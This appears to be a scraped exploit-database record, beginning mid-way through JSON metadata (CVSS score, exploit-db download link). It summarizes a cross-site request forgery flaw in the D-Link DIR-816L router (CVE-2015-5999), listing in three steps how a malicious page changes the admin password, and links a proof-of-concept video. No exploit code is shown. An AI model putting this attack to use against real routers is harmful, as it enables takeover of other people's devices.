(www.helpag.com)\r\n----------------------------------------------------------------------------------------------", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/38707/"}]}

D-Link DIR-816L (Wireless Router) - Cross-Site Request Forgery (CVE-2015-5999)

Description

1) User login to DIR-816L wireless router 2) User visits the attacker's malicious web page (attacker.html) 3) attacker.html exploits CSRF vulnerability and changes the admin account password PoC video link: http://youtu.be/UBdR2sUc8Wg

1) User login to DIR-816L wireless router

2) User visits the attacker's malicious web page (attacker.html)

3) attacker.html exploits CSRF vulnerability and changes the admin account password

PoC video link: http://youtu.be/UBdR2sUc8Wg